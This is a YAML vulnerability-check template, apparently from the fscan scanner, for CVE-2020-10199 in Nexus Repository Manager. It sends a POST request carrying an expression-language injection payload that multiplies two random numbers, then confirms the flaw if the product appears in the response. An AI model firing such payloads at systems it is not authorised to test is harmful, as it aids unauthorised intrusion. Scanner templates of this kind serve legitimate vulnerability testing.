mirror of https://github.com/qwqdanchun/fscan.git
22 lines
946 B
YAML
22 lines
946 B
YAML
|
name: poc-yaml-nexus-cve-2020-10199
|
||
|
set:
|
||
|
r1: randomInt(40000, 44800)
|
||
|
r2: randomInt(40000, 44800)
|
||
|
rules:
|
||
|
- method: POST
|
||
|
path: "/rest/beta/repositories/go/group"
|
||
|
headers:
|
||
|
Content-Type: application/json
|
||
|
body: |
|
||
|
{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}}
|
||
|
expression: |
|
||
|
response.status == 400 && response.body.bcontains(bytes(string(r1 * r2)))
|
||
|
detail:
|
||
|
Affected Version: "nexus<3.21.2"
|
||
|
author: kingkk(https://www.kingkk.com/)
|
||
|
links:
|
||
|
- https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
|
||
|
- https://www.cnblogs.com/magic-zero/p/12641068.html
|
||
|
- https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
|
||
|
- https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
|